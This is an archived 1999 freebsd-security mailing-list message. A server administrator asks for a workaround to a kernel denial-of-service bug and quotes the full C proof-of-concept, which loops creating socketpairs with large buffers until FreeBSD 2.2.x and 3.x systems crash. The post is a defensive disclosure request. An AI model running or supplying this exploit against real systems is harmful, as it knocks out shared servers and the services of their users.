Date: Mon, 16 Aug 1999 20:40:29 -0400 From: Mike Tancsa <mike@sentex.net> To: freebsd-security@freebsd.org Subject: Any work around for this FreeBSD bug/DoS ? Message-ID: <4.1.19990816203409.05989960@granite.sentex.ca>
index | next in thread | raw e-mail
Is there any work around or coming fix for the 'testsockbuf.c' originally
reported by Marc Olzheim <marcolz@ilse.nl> on Aug 9th ? Its only a matter
of time until some wannabe script kiddie uploads it to one of my servers
for his/her cgi-script. It crashes 2.2.x and 3.x servers reliably :-( I
sent a message to the security officer last week but havent heard anything
since then.
---Mike
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#define BUFFERSIZE 204800
extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];
while (1)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
return(0);
}
---Mike
**********************************************************************
Mike Tancsa, Network Admin * mike@sentex.net
Sentex Communications Corp, * http://www.sentex.net/mike
Cambridge, Ontario * 01.519.651.3400
Canada *
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
help
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?4.1.19990816203409.05989960>